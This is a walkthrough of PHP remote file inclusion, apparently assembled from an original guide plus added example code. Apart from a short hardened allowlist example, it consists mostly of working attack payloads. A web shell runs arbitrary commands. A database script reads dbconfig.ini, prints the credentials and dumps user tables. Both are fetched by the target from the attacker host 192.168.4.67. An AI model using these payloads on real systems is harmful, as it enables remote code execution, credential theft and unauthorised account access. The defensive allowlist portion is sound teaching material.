Basic PHP Remote File Inclusion Exploitation
In this guide, we will perform a simple PHP remote file inclusion.
The goal is to log in to the website with credentials stored in its database.
The credentials are obtained by dumping the database content through the remote file inclusion, which gives remote code execution on the web server.
The badly programmed website includes any file that is supplied as the value of the phpfile URL parameter.
The exploit is possible because of this programming mistake combined with an insecure server setting: PHP only fetches and executes a remote URL passed to include() when allow_url_include (and allow_url_fopen) is enabled in php.ini.
PHP is often used to load content dynamically based on parameters in the URL.
Given a parameter in the link, the server decides at request time which content to load depending on the parameter value, instead of a static page being created for every possible value.
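The dynamic-include pattern described above, as an added example that is not code from the original page: the vulnerable form, where the parameter value reaches include() unchanged, next to a hardened form that treats the parameter only as a key into a fixed allowlist. The parameter name phpfile and the attacker address 192.168.4.67 are the page's; the page names, the pages/ directory and the function names are assumptions.

```php
<?php
// Added example, not the original page's code.

// Vulnerable pattern: the phpfile parameter is passed straight to include().
// With allow_url_include=On, ?phpfile=http://192.168.4.67/cmd.txt makes PHP
// fetch and execute the attacker's file on this server. Even with it Off, a
// traversal value such as ?phpfile=../../../etc/passwd still reads local
// files (local file inclusion), so the code is wrong regardless of php.ini.
function render_vulnerable(): void
{
    $page = $_GET['phpfile'] ?? 'home';
    include $page;
}

// Hardened pattern: the parameter is only looked up in an allowlist, so the
// path handed to include() never contains attacker-controlled characters.
// Keep allow_url_include=Off (and allow_url_fopen=Off where the application
// permits) in php.ini as defence in depth. Page names are assumptions.
const ALLOWED_PAGES = [
    'home'    => 'home.php',
    'news'    => 'news.php',
    'contact' => 'contact.php',
];

function resolve_page(?string $key): ?string
{
    $key = $key ?? 'home';
    if (!array_key_exists($key, ALLOWED_PAGES)) {
        return null;   // URLs, ../ sequences, null bytes: all fall through here
    }
    return __DIR__ . '/pages/' . ALLOWED_PAGES[$key];
}

function render_hardened(): void
{
    $path = resolve_page($_GET['phpfile'] ?? null);
    if ($path === null) {
        http_response_code(404);
        echo 'Unknown page';
        return;
    }
    include $path;
}

render_hardened();
```

Note that appending a fixed suffix (include $page . '.php') is not a fix: a value such as http://192.168.4.67/cmd.txt? turns the suffix into part of the remote query string, and the remote file is still fetched and executed.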
A remote file inclusion vulnerability can be tested for by supplying a remote URL as the parameter value.
The inclusion has succeeded if the rendered page is a mixture of the original website and the page behind the URL that was given as the value of the vulnerable parameter:
Including the script as the parameter value (client IP: 192.168.4.67, server URL: 192.168.4.66):
Note that the script has to be uploaded to a location reachable by the web server hosting the vulnerable website; in this case it is hosted on another web server in the local network.
It is served with a .txt extension so that the hosting server returns it as plain text instead of executing it itself; the PHP tags are only interpreted by the vulnerable target after include().
Remote inclusion of the cmd.txt script with the 'dir' command (lists folder contents):
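A command-execution script of the kind the page's cmd.txt represents, as an added example that is not the page's own file. The target's PHP fetches it over HTTP, parses it and runs it in the context of the vulnerable request, so $_GET below is the target's query string, not the attacker server's. The cmd parameter name, the default 'dir' and the request URL in the comment are assumptions; the IP addresses are the page's.

```php
<?php
// cmd.txt: added example payload, not the original page's script.
// Triggered on the target with a request such as
//   http://192.168.4.66/index.php?phpfile=http://192.168.4.67/cmd.txt&cmd=dir
// The command runs with the privileges of the web server process.
$cmd = $_GET['cmd'] ?? 'dir';   // 'dir' lists the current folder, matching the page's example

echo "<pre>\n";
echo 'cwd:  ', htmlspecialchars((string) getcwd()), "\n";
// Report the account we run as; posix_* exists on Unix, USERNAME on Windows.
$user = function_exists('posix_geteuid')
    ? (posix_getpwuid(posix_geteuid())['name'] ?? '?')
    : (getenv('USERNAME') ?: '?');
echo 'user: ', htmlspecialchars($user), "\n\n";

// shell_exec may be listed in disable_functions; function_exists() returns
// false for disabled functions, so try proc_open as a fallback.
if (function_exists('shell_exec')) {
    // "2>&1" merges stderr into the captured output on both sh and cmd.exe
    echo htmlspecialchars((string) shell_exec($cmd . ' 2>&1'));
} elseif (function_exists('proc_open')) {
    $spec = [1 => ['pipe', 'w'], 2 => ['pipe', 'w']];
    $proc = proc_open($cmd, $spec, $pipes);
    if (is_resource($proc)) {
        $out = stream_get_contents($pipes[1]) . stream_get_contents($pipes[2]);
        fclose($pipes[1]);
        fclose($pipes[2]);
        proc_close($proc);
        echo htmlspecialchars($out);
    }
} else {
    echo "no command execution function available (check disable_functions)\n";
}
echo "</pre>\n";
```

Because the output is echoed into the middle of the target's normal page, the listing appears embedded in the original layout, which is the same "mixture" effect used to confirm the vulnerability in the first place.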
PHP script to be included remotely (lists the tables in the database; it parses the dbconfig.ini stored on the vulnerable target web server for the SQL server login credentials):
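A database-enumeration script matching the description above, as an added example that is not the page's own script. It runs on the target after the same remote include as cmd.txt, so it has the target's file system and network access. The page does not give the layout of dbconfig.ini, its location or the database type; the example assumes the file is in the target's document root, uses PHP ini syntax with a [database] section holding host, user, password and dbname, and that the backend is MySQL/MariaDB reachable through mysqli. It goes one step beyond the page's screenshot by also dumping a chosen table through an assumed table parameter.

```php
<?php
// dbdump.txt: added example payload, not the original page's script.
// Included on the target via ?phpfile=http://192.168.4.67/dbdump.txt
// Assumptions: dbconfig.ini in the document root, [database] section with
// host/user/password/dbname, MySQL backend, mysqli extension present.

function load_db_config(string $path): ?array
{
    if (!is_readable($path)) {
        return null;
    }
    $ini = parse_ini_file($path, true);   // true: keep [section] structure
    if ($ini === false) {
        return null;
    }
    // Accept either a [database] section or flat top-level keys.
    return $ini['database'] ?? $ini;
}

mysqli_report(MYSQLI_REPORT_OFF);   // PHP 8.1+ throws by default; keep errno checks below

$docroot = $_SERVER['DOCUMENT_ROOT'] ?? getcwd();
$cfg = load_db_config(rtrim($docroot, '/\\') . '/dbconfig.ini');

echo "<pre>\n";
if ($cfg === null) {
    echo "dbconfig.ini not found or unreadable\n</pre>\n";
    return;   // return in an included file ends only the include, the host page continues
}

// The credentials themselves are the first result worth reading.
printf("host=%s user=%s password=%s db=%s\n\n",
    htmlspecialchars($cfg['host'] ?? 'localhost'),
    htmlspecialchars($cfg['user'] ?? ''),
    htmlspecialchars($cfg['password'] ?? ''),
    htmlspecialchars($cfg['dbname'] ?? ''));

$db = new mysqli($cfg['host'] ?? 'localhost', $cfg['user'] ?? '',
                 $cfg['password'] ?? '', $cfg['dbname'] ?? '');
if ($db->connect_errno) {
    echo 'connect failed: ', htmlspecialchars($db->connect_error), "\n</pre>\n";
    return;
}

$tables = [];
$res = $db->query('SHOW TABLES');
while ($res && ($row = $res->fetch_row())) {
    $tables[] = $row[0];
}
echo 'tables: ', htmlspecialchars(implode(', ', $tables)), "\n\n";

// Optional ?table=<name> dumps up to 50 rows of one table. The name must match
// an entry from SHOW TABLES and is backtick-quoted, so table names in the
// target's own schema cannot inject into the query we send.
$want = $_GET['table'] ?? null;
if ($want !== null && in_array($want, $tables, true)) {
    $quoted = '`' . str_replace('`', '``', $want) . '`';
    $res = $db->query('SELECT * FROM ' . $quoted . ' LIMIT 50');
    while ($res && ($row = $res->fetch_assoc())) {
        echo htmlspecialchars(json_encode($row)), "\n";
    }
}
$db->close();
echo "</pre>\n";
```

A typical run is two requests: the first without table to read the credentials and the table list, the second with table set to whatever holds the user accounts, which provides the login data the guide is after.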